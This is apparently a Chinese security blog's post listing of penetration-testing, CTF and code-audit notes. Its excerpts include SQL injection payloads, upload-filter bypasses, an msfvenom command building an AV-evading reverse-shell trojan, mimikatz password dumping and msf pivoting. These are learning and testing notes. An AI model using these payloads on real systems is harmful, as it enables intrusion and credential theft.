自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 收藏
  • 关注

转载 web工具集合(转)

原作者:https://blog.csdn.net/sonbyn001/article/details/72782720+看到收藏一波,有需要时可用上安全行业从业人员常用工具指引,包括各类在线安全学习资料和安全检测工具,欢迎大家持续贡献!入门指南https://wizardforcel.gitbooks.io/web-hacking-101/content/ ...

2019-06-18 14:30:58 513

原创 文件上传绕过总结

上传绕过总结一、前端js绕过我们上传1.php文件时,前端阻止上传弹窗,说明存在前端验证文件。绕过:修改前端js代码,利用f12可修改 把1.php改为1.jpg,再利用bp抓包,修改回1.php也可上传二、黑白名单绕过,如果可以上传phtml php3 php4 php5 Php php (空格) php.,pphphp如果上传成功,测试是否能够解析不...

2019-05-12 17:01:29 24916 4

原创 Sql注入总结

Sql注入总结联合查询:1、利用闭合变量报错测试注入点, ?id=1’ .这样说明存在单引号闭合注入2、是否存在注入点,用and语句测试 ?id=1’ and 1=2# ?id=1’ and 1=1#3、猜测字段 ,?id=1’ order by 3%234、找到页面中数据输入点, ?id=-1’ union select 1,2,3%235、查数据库,?id=1’ union ...

2019-05-12 14:11:08 1942 1

原创 zimbra rce 漏洞复现

本地搭建了好久,虚拟机突然蹦了,。。。上钟馗之眼和shodan找了个目标第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件Zimbra配置文件位置为/conf/localconfig.xml根据《A Saga of Code Executions on Zimbra》RCE漏洞分析https://blog.csdn.net/fnmsd/article/details/88...

2019-05-12 03:46:37 6685

转载 centos7 安装mysql服务(转)

https://www.cnblogs.com/starof/p/4680083.htmlhttps://www.cnblogs.com/sgor/p/6478674.html666666666666

2019-03-15 21:33:15 149

原创 docker自定义容器部署与镜像发布笔记+数据库用户权限分配管理笔记

1docker 从被我使用以来,一直都是个坑。这两天又用到了。记录一下搭建属于自己的镜像。因为仓库很多镜像除了基础镜像。用别人的好像都变了个样。各种错误。只能自定义自己需要的了。利用centos7基础镜像安装自己所需的集成环境lamp加各种命令集合。打包成镜像然后上传仓库。搭建命令docker run --privileged -d -it -v /test1:/soft -p 87:8...

2019-03-12 00:53:11 317

原创 centos 安装lamp(php+mysql+apache) 记录一下

centos 安装lamp(php+mysql+apache) 记录一下我们可以先查看我们服务器系统信息:uname -a 查看系统内核版本信息cat /etc/issue 查看版本lsb_release -a 查看版本卸载apache查找一下跟httpd相关的软件包rpm -qa|grep httpd卸载软件包rpm -e httpd相关的软件包卸载apache服务...

2019-03-11 23:44:34 144

原创 一次实战记录

前几天遇到了个挺坑的网站是dedecms,一发现是它,我第一时间利用/data/admin/ver.txt得到更新年份20170504 查看官网的历史版本信息,发现是dedecms v7.5 sp2 版本记得这个版本存在前台search.php文件的注入漏洞、前台任意用户密码重置漏洞、前台cookie伪造登陆到管理员前台账号,再利用前台管理员用户重置后台管理员的密码。从而进入后台进行get...

2019-03-08 19:30:20 2048

原创 s-cms代码审计一注入一xss

在bbs.php文件出现延时注入require '../conn/conn2.php';require '../conn/function.php';$action=$_GET["action"];$S_id=$_GET["S_id"];if($action=="add"){$B_title=htmlspecialchars($_POST["B_title"]);$B_sort=$_...

2019-02-14 21:48:00 446

原创 在bluecms6.1版本的ad_js.php处有xss漏洞

在bluecms6.1版本的ad_js.php处有xss漏洞adid=!empty(ad_id = !empty(adi​d=!empty(_GET[‘ad_id’]) ? trim(GET[′adid′]):′′;if(empty(_GET['ad_id']) : '';if(empty(G​ET[′adi​d′]):...

2019-02-12 17:14:26 312

转载 各种报错注入payload总结——转自郁离歌

郁离歌:https://blog.csdn.net/like98k/article/details/79646512 0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过...

2019-01-26 21:59:29 4831

原创 msf生成win版免杀木马

参考一大佬的在linux下生成一个反弹的msf的python脚本,命令如下:msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /mo.py查看下py的内容将buf值全部替换成mo.py的,其他不用修改from c...

2019-01-24 21:06:57 7074 11

原创 子域名和源码泄露小脚本

这两天测试了好些脚本,子域名查询和源码泄露脚本都是githug上找的,不过本地测试都有报错这就是py的无奈的地方,于是得自己动手改,和完善一些地方子域名爆破脚本,功能比较单一,#encoding:utf-8__author__ = 'Beyond'import sysimport httplibimport threadingimport Queueimport stri...

2019-01-23 21:18:37 491

原创 thinkphp5.0和5.1 rce poc总结

照搬Sp4ce大神的: https://bbs.ichunqiu.com/thread-49591-1-1.html版本名 是否可被攻击 攻击条件5.0.0 否 无5.0.1 否 无5.0.2 否 无5.0.3 否 无5.0.4 否 无5.0.5 否 无5.0...

2019-01-20 18:24:26 12495

原创 代码审计之scms——search.php注入漏洞

电脑没网络,只能在本地审计之前审计过的cms,这次审计scms还是法师审计工具自动审计一波,发现可能存在漏洞的文件,发现fearch.php可能存在sql注入。<?phprequire 'conn/conn.php';require 'conn/function.php';$action=$_GET["action"];$keyword=$_REQUEST["keyword"]...

2019-01-18 22:15:29 2420

原创 msf 代理内网机器后,进行内网其他网段机器的渗透

##titile :msf 代理内网机器后,进行内网其他网段机器的渗透首先利用反弹木马返回meterpreter shell利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备run get_local_subnets //获取路由地址run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由run autoroute -p //查看添加...

2018-12-29 00:20:38 2863

原创 scms审计笔记之注入

1.在buy.php。69到71 行sql="select∗fromSLproductwherePid=".sql="select * from SL_product where P_id=".sql="select∗fromSLp​roductwherePi​d=".P_id;result=mysqliquery(re...

2018-12-19 16:10:54 581

原创 bluecms审计笔记

##title:bluecms审计笔记在本地下载bluecms源码并搭建利用代码审计工具进行自动扫描,一一审计可能出现的漏洞第一条说存在sql注入,我们点开这个文件看看。在ad_js.php中$ad = db−>getone("SELECT∗FROM".table(′ad′)."WHEREadid=&quot...

2018-12-12 21:43:06 238

原创 2018X-NUCA------auth2

title:2018X-NUCA第一道web题就让人爆炸,瞬间怀疑人生题目地址:http://106.75.66.211:8000/main/login?next=/main/index是绕过stata的auth2.0,第三方授权绑定目标用户的漏洞。个人理解:攻击者在登陆网站前,进行第三方的授权登陆,一般使用qq,微博进行第三方授权。具体利用:点金第三方授权按钮,进入授权页面,此过程需...

2018-11-26 11:39:33 373

原创 代码审计------http头注入

http头部注入User-Agent引发sql注入:下面的是存在注入的代码:?php$link = new mysqli(‘localhost’, ‘insecure’, ‘1ns3cur3p4ssw0rd’, ‘analytics’);$query = sprintf(“INSERT INTO visits (ua, dt) VALUES (’%s’, ‘%s’)”,$_SERVE...

2018-11-23 00:02:44 731

转载 报错注入各种语句

报错注入1、通过floor报错,注入语句如下:  and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、通过ExtractValue报错,注入语句如下:and extractvalue(1, con...

2018-11-22 19:18:52 1993 1

原创 ctf---pzctf赛前测试题

title:pzctf赛前测试题0x01 phpmyadmin后台文件包含phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。CVE-2018-12613 PhpMyadmin后台文件包含分析,影响版本如下:phpMyAdmin 4.8.0和4.8.1受到影响。第一题:点进去是一个phpmyadmin登陆后台(普通权限)第一时间想到是into oufil...

2018-11-22 11:43:25 1331

转载 session默认目录

 在php.ini里的配置session.save_path是注释掉的,那么Seesion保存的路径在不同类型操作系统保存在什么位置?Linux:/tmp 或 /var/lib/php/sessionWindows:C:\WINDOWS\Temp...

2018-10-29 23:22:42 1468

原创 2018护网杯——easy_dump

题目:链接: https://pan.baidu.com/s/1IdhDQAv02nAz0H211BoVgA 提取码: axgp做题时看到下载下来的600m,懵逼中,看到是img镜像文件当然想到的是利用diskgenuis恢复文件找特别文件再进行解密。一直做不出,是我想的太简单了,昨天看了大佬写的wp,满怀敬佩的心复现一下参考i春秋大佬:lem0n  实验用到的工具:k...

2018-10-19 17:25:43 3267 2

原创 ctf中的一道反序列化题

早就想写了,今天刚好遇到一道反序列化的题就记录一下自己在本地搭的,源码如下:index1.php<?phperror_reporting(E_ALL & ~E_NOTICE);$user = $_GET["user"];$file = $_GET["file"];$pass = $_GET["pass"]; if(isset($user)&&...

2018-09-27 23:59:55 5192

原创 mimikatz读取用户密码

当我们getshell之后,一般是提权拿下远程服务器,刚学习了一个直接读取远程服务器的密码的工具mimikatz首先先利用 privilege::debug 提生权限 sekurlsa::logonPasswords就是抓取密码这是我本机的,空密码 另外当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用...

2018-09-26 16:18:32 17596

原创 discuz7.2sql注入漏洞

今天尝试了discuz7.2动力论坛的sql注入漏洞原因是由faq.php文件源码存在漏洞引起的下载官方discuz7.2源码,在本地搭建漏洞环境http://www.comsenz.com/downloads/install/discuz下载的三个文件利用http://localhost:8088/discuz72/upload/install/index.php进行安装...

2018-09-20 03:00:16 8209

原创 upload-labs17

 upload-labs一个帮你总结所有类型的上传漏洞的靶场文件上传靶机下载地址:https://github.com/c0ny1/upload-labs第17题,条件竞争删除文件绕过源码:$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = array('jpg','png...

2018-09-17 15:49:39 1938 1

原创 学习笔记-------web 安全攻防 cdn查询真实ip方法总结

信息收集:服务器配置、网站敏感信息(后台、文件目录、敏感文件、注入点、上传点、xss点、域名、子域名)、目标网站系统、cms指纹、真实ip、开放端口。爱站:https://www.aizhan.com可以获取一般网站的ip,域名,子域名,服务器信息绕过CDN查找网站真实IP方法收集方法1很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用...

2018-09-12 09:40:35 581

原创 视频下载-------python

今天看了一个小视频,很好笑说的是:欲练神功,挥刀自宫,如不自宫,也能成功观看链接:https://m.baidu.com/?from=1012852s#iact=wiseindex%2Ftabs%2Fnews%2Factivity%2Fnewsdetail%3D%257B%2522linkData%2522%253A%257B%2522name%2522%253A%2522iframe...

2018-09-05 00:26:56 866

原创 基于时间的盲注

延时注入,用的最多的注入常用的判断语句:' and if(1=0,1, sleep(10)) --+ " and if(1=0,1, sleep(10)) --+) and if(1=0,1, sleep(10)) --+') and if(1=0,1, sleep(10)) --+") and if(1=0,1, sleep(10)) --+ 写这篇文章只是为了更...

2018-09-01 00:02:02 11835

原创 sqlilabs--7 无法正常导出数据小结

自己在本地搭建的手工注入环境----sqlilabs 可百度下载源码搭建,网上很多教程就不再介绍演示靶场如下:  提示赋值一个id的值,虽然不知道是get方式还是post方式,先试试get 可以发现页面进入成功,并提示use outfile。百度outfile 发现是mysql注入中导出数据库数据的用法。具体用法:into outfile "导出数据的路径接下来找注...

2018-08-31 02:14:24 1129

原创 双注入报错查询

双注入查询需要理解四个函数/语句1. Rand() //随机函数2. Floor() //取整函数3. Count() //汇总函数,聚合函数一种4. Group by clause //分组语句5. concat() //连接字符函数双注入原理:当聚合函数遇到分组函数,会报错显示部分子查询的结果双注入公式:select count(*),concat((select ...

2018-08-27 02:24:12 358

原创 “百度杯”CTF比赛 九月场SQLi ---------mozhe

题目链接:https://www.ichunqiu.com/battalion点击进去,查看源代码 发现login.php?id=1一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...

2018-08-25 01:36:39 1442

原创 实验吧----打不开的文件

解题链接: http://ctf5.shiyanbar.com/423/stego/xx.gif点开出现老套路,跟上一篇一样脚本下载import requestsresponse = requests.get('http://ctf5.shiyanbar.com/423/stego/xx.gif')cat_img = response.contentwith op...

2018-08-10 13:51:28 538

原创 实验吧-----IHDR

解题链接: http://ctf5.shiyanbar.com/stega/IHDR.png 有点坑哈,点开链接发现图片因存在错误而无法显示,一开始我是以为题目炸了,直接跳过。后来才知道。。。坑可以利用脚本下载import requestsimport io,syssys.stdout = io.TextIOWrapper(sys.stdout.buffer,encod...

2018-08-09 21:38:43 4040

原创 ctf-----当眼花的时候,会显示两张图分值:30

解题链接: http://ctf5.shiyanbar.com/stega/final.png 通过题目已经提示有两张图片那就把第二张图片找出来一般使用工具:binwalk 查看是否隐藏其它文件,再利用-cp命令或者foremost分离。不过我电脑暂时没有装这两个工具。使用winhex已知PNG格式的图片的文件头为:89504E47在winhex打开final.png...

2018-08-07 18:13:19 2403

原创 python-----爬新浪新闻标题链接

import reimport urllib.requestimport ioimport sysimport requestssys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')#改变输出的编码。如无乱码问题可不写response = requests.get('http://roll.news.sina...

2018-08-06 10:36:05 262

原创 python-----目录扫描

用到两个库:requesets,用于页面的请求提交和响应的库。argparse:用于命令行参数解析的库一般形式:import argparseparser = argparse.ArgumentParser(description="your script description") # description参数可以用于插入描述脚本用途的信息,可以为空p...

2018-08-06 00:22:21 1398

原创 SQL盲注注入——布尔型

盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。Length()函数 返回字符串的长度Substr()截取字符串Ascii()返回字符的ascii码sleep(n):将程序挂起一段时间 n为n秒if(expr1,expr2,expr3):判断语句 如果第一个语...

2018-08-03 15:55:28 42036 7

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除